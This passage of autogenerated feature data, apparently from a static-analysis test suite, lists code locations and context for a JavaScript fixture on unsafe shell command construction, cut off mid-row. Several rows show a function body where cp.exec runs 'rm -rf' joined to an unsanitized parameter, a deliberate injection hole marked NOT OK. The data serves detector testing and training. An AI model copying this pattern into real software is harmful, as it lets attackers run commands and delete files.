autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:21:6:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:12 | cp.execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:12 | cp.execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:12 | cp.execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:12 | cp.execFile | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:12 | cp.execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | exceptional return of cp.exec ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | exceptional return of cp.exec ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | exceptional return of cp.exec ... , name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | exceptional return of cp.exec ... , name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | exceptional return of cp.exec ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:5:7:12 | execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:5:7:12 | execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:5:7:12 | execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:5:7:12 | execFile | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:5:7:12 | execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:14:7:17 | name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:20:7:23 | name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:18 | module.exports.foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:18 | module.exports.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:10:18 | module.exports.foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:12:1 | module. ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:12:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:1:12:1 | module. ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:8:10:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:8:10:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:8:10:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:16:10:18 | foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 